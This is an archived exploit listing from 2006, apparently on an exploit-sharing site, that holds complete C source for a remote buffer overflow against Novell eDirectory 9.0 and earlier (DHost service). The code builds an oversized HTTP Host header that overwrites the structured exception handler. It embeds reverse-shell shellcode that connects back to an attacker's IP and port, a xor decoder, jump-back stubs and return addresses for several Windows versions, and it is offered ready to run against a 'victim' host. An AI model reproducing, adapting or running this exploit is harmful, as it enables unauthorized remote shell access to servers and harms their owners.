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XHNB-Novell-eDirectory_remote_bof.c

XHNB-Novell-eDirectory_remote_bof.c
Posted Nov 7, 2006
Authored by Expanders, Manuel Santamarina Suarez

Novell eDirectory versions 9.0 and below DHost remote buffer overflow exploit.

tags | exploit, remote, overflow
SHA-256 | 1acfa7a13ca13f316e5a4c8f1d11e2f197cda1019616c5dc3401e0d70f57d958

XHNB-Novell-eDirectory_remote_bof.c

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/*
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___ __\ _ \ ____ \_____ \ | |__ / | | ____ | | __
\ \/ / /_\ \ / \ _(__ < ______ | | \ / | |__/ ___\| |/ /
> <\ \_/ \ | \/ \ /_____/ | Y \/ ^ /\ \___| <
/__/\_ \\_____ /___| /______ / |___| /\____ | \___ >__|_ \
\/ \/ \/ \/ 30\10\06 \/ |__| \/ \/

* mm. dM8
* YMMMb. dMM8 _____________________________________
* YMMMMb dMMM' [ ]
* `YMMMb dMMMP [ There are doors I have yet to open ]
* `YMMM MMM' [ windows I have yet to look through ]
* "MbdMP [ Going forward may not be the answer ]
* .dMMMMMM.P [ ]
* dMM MMMMMM [ maybe I should go back ]
* 8MMMMMMMMMMI [_____________________________________]
* YMMMMMMMMM www.netbunny.org
* "MMMMMMP
* MxM .mmm
* W"W """


[i] Title: Novell eDirectory <= 9.0 DHost Buffer overflow exploit
[i] Discovered by: Novell
[i] Original code by: FistFuXXer
[i] Exploit by: Expanders
[i] Filename: XHNB-Novell-eDirectory_remote_bof.c
[i] References: http://www.novell.com/
[i] Greatings: x0n3-h4ck - netbunny

[ Research diary ]

After a try of FistFuXXer's perl exploit I started to port the code in C and also use a different exploiting
method. This exploit overwrite the Second Exception Handler to take control of the program flow.

[ Special thanks ]

FistFuXXer
H D Moore

[ Links ]

www.x0n3-h4ck.org
www.netbunny.org

*/

#include <stdio.h>
#include <sys/socket.h>
#include <sys/types.h>
#include <sys/stat.h>
#include <netinet/in.h>
#include <netdb.h>
#include <unistd.h>

#define BUFFSIZE 1000 // Buffer size
#define DEADRET "\xde\xc0\xad\xde" // this address cause the exception to be called

int banner();
int usage(char *filename);
int inject(char *port, char *ip);
int remote_connect( char* ip, unsigned short port );


char attack[] =
"GET /nds HTTP/1.1\r\n"
"Host: %s\r\n\r\n";

/* win32_reverse - EXITFUNC=seh Size=312 Encoder=Pex http://metasploit.com */
char shellcode[] =
"\x29\xc9\x83\xe9\xb8\xd9\xee\xd9\x74\x24\xf4\x5b\x81\x73\x13\x3f"
"\x61\x88\x6f\x83\xeb\xfc\xe2\xf4\xc3\x0b\x63\x22\xd7\x98\x77\x90"
"\xc0\x01\x03\x03\x1b\x45\x03\x2a\x03\xea\xf4\x6a\x47\x60\x67\xe4"
"\x70\x79\x03\x30\x1f\x60\x63\x26\xb4\x55\x03\x6e\xd1\x50\x48\xf6"
"\x93\xe5\x48\x1b\x38\xa0\x42\x62\x3e\xa3\x63\x9b\x04\x35\xac\x47"
"\x4a\x84\x03\x30\x1b\x60\x63\x09\xb4\x6d\xc3\xe4\x60\x7d\x89\x84"
"\x3c\x4d\x03\xe6\x53\x45\x94\x0e\xfc\x50\x53\x0b\xb4\x22\xb8\xe4"
"\x7f\x6d\x03\x1f\x23\xcc\x03\x2f\x37\x3f\xe0\xe1\x71\x6f\x64\x3f"
"\xc0\xb7\xee\x3c\x59\x09\xbb\x5d\x57\x16\xfb\x5d\x60\x35\x77\xbf"
"\x57\xaa\x65\x93\x04\x31\x77\xb9\x60\xe8\x6d\x09\xbe\x8c\x80\x6d"
"\x6a\x0b\x8a\x90\xef\x09\x51\x66\xca\xcc\xdf\x90\xe9\x32\xdb\x3c"
"\x6c\x22\xdb\x2c\x6c\x9e\x58\x07\x35\x61\x88\x6c\x59\x09\x8c\x69"
"\x59\x32\x01\x8e\xaa\x09\x64\x96\x95\x01\xdf\x90\xe9\x0b\x98\x3e"
"\x6a\x9e\x58\x09\x55\x05\xee\x07\x5c\x0c\xe2\x3f\x66\x48\x44\xe6"
"\xd8\x0b\xcc\xe6\xdd\x50\x48\x9c\x95\xf4\x01\x92\xc1\x23\xa5\x91"
"\x7d\x4d\x05\x15\x07\xca\x23\xc4\x57\x13\x76\xdc\x29\x9e\xfd\x47"
"\xc0\xb7\xd3\x38\x6d\x30\xd9\x3e\x55\x60\xd9\x3e\x6a\x30\x77\xbf"
"\x57\xcc\x51\x6a\xf1\x32\x77\xb9\x55\x9e\x77\x58\xc0\xb1\xe0\x88"
"\x46\xa7\xf1\x90\x4a\x65\x77\xb9\xc0\x16\x74\x90\xef\x09\x78\xe5"
"\x3b\x3e\xdb\x90\xe9\x9e\x58\x6f";

char jmpback[]=
//22 byte xor decoder (0x55)
"\xEB\x0F\x5B\x33\xC9\x66\x83\xE9\xE0\x80\x33\x55\x43\xE2\xFA\xEB\x05\xE8\xEC\xFF\xFF\xFF"
//(20 byte jump-back code -> 256 + 256 + 64 bytes)
"\x8C\xBB\x8C\x21\x71\xA1\x0C\xD5\x94\x5F\xC5\xAB\x98\xAB\x98\xD5\xBC\x15\xAA\xB4";

char jmpover[]=
// 2 bytes jump 6 bytes over - 2 bytes NOP
"\xEb\x06\x90\x90";

struct retcodes{char *platform;unsigned long addr;} targets[]= {
{ "eDirectory MFC42U.dll", 0x5f80bbf7 },
{ "Windows NT SP 5/6" , 0x776a1082 }, // ws2help.dll pop esi, pop ebx, retn [Tnx to metasploit]
{ "Windows 2k Universal" , 0x750211a9 }, // ws2help.dll pop ebp, pop ebx, retn [Tnx to metasploit]
{ "Windows XP Universal" , 0x71abe325 }, // ws2help.dll pop ebx, pop ebp, retn [Tnx to metasploit]
{ NULL }
};
int banner() {
printf("\n _______ ________ .__ _____ __ \n");
printf("___ __\\ _ \\ ____ \\_____ \\ | |__ / | | ____ | | __ \n");
printf("\\ \\/ / /_\\ \\ / \\ _(__ < ______ | | \\ / | |__/ ___\\| |/ / \n");
printf(" > <\\ \\_/ \\ | \\/ \\ /_____/ | Y \\/ ^ /\\ \\___| < \n");
printf("/__/\\_ \\\\_____ /___| /______ / |___| /\\____ | \\___ >__|_ \\ \n");
printf(" \\/ \\/ \\/ \\/ \\/ |__| \\/ \\/ \n\n");
printf("[i] Title: \tNovell eDirectory DHost Buffer overflow\n");
printf("[i] Perl Code by:\tFistFuXXer\n");
printf("[i] Exploit by: \tExpanders\n\n");
return 0;
}

int usage(char *filename) {
int i;
printf("Usage: \t%s <host> <port> <l_ip> <l_port> <targ>\n\n",filename);
printf(" \t<host> : Victim's host\n");
printf(" \t<port> : Victim's port :: Default: 8028\n");
printf(" \t<l_ip> : Local ip address for connectback\n");
printf(" \t<l_port> : Local port for connectback\n");
printf(" \t<targ> : Target from the list below\n\n");

printf("# \t Platform\n");
printf("-----------------------------------------------\n");
for(i = 0; targets[i].platform; i++)
printf("%d \t %s\n",i,targets[i].platform);
printf("-----------------------------------------------\n");
exit(0);
}

int inject(char *port, char *ip)
{
unsigned long xorip;
unsigned short xorport;
xorip = inet_addr(ip)^(unsigned long)0x6F88613F;
xorport = htons(atoi( port ))^(unsigned short)0x6F88;
memcpy ( &shellcode[184], &xorip, 4);
memcpy ( &shellcode[190], &xorport, 2);
return 0;
}

int remote_connect( char* ip, unsigned short port )
{
int s;
struct sockaddr_in remote_addr;
struct hostent* host_addr;

memset ( &remote_addr, 0x0, sizeof ( remote_addr ) );
if ( ( host_addr = gethostbyname ( ip ) ) == NULL )
{
printf ( "[X] Cannot resolve \"%s\"\n", ip );
exit ( 1 );
}
remote_addr.sin_family = AF_INET;
remote_addr.sin_port = htons ( port );
remote_addr.sin_addr = * ( ( struct in_addr * ) host_addr->h_addr );
if ( ( s = socket ( AF_INET, SOCK_STREAM, 0 ) ) < 0 )
{
printf ( "[X] Socket failed!\n" );
exit ( 1 );
}
if ( connect ( s, ( struct sockaddr * ) &remote_addr, sizeof ( struct sockaddr ) ) == -1 )
{
printf ( "[X] Failed connecting!\n" );
exit ( 1 );
}
return ( s );
}

int main(int argc, char *argv[]) {
int s,position;
unsigned int rcv;
char *buffer,*request;
char recvbuf[256];
banner();
if( (argc != 6) || (atoi(argv[2]) < 1) || (atoi(argv[2]) > 65534) )
usage(argv[0]);
position = 0;
printf("[+] Creating evil buffer\n");
buffer = (char *) malloc(BUFFSIZE);
request = (char *) malloc(BUFFSIZE + strlen(attack)); // +3 == \r + \n + 0x00
memset(buffer,0x90,BUFFSIZE); // Fill with nops

inject(argv[4],argv[3]); // Xor port and ip and put them into the shellcode
memset(buffer,0x41,68); // First comes the ascii
position = 68;
memcpy(buffer+position,DEADRET,4);
position = 680 - (strlen(shellcode) + 100); // 680 : Pointer to next Execption structure
memcpy(buffer+position,shellcode,strlen(shellcode));
position += strlen(shellcode)+100;
memcpy(buffer+position,jmpover,4); position += 4;
memcpy(buffer+position,&targets[atoi(argv[5])].addr,4); position += 4;
position += 8; // 8 bytes more nops
memcpy(buffer+position,jmpback,strlen(jmpback)); position += strlen(jmpback);
position += 8; // 8 bytes more nops
memset(buffer+position,0x00,1); // End


sprintf(request,attack,buffer);
printf("[+] Connecting to remote host\n");
s = remote_connect(argv[1],atoi(argv[2]));
sleep(1);
printf("[+] Sending %d bytes of painfull buffer\n",strlen(buffer));
if ( send ( s, request, strlen (request), 0) <= 0 )
{
printf("[X] Failed to send buffer\n");
exit ( 1 );
}
printf("[+] Done - Wait for shell on port %s\n",argv[4]);
close(s);
free(buffer);
buffer = NULL;
return 0;
}


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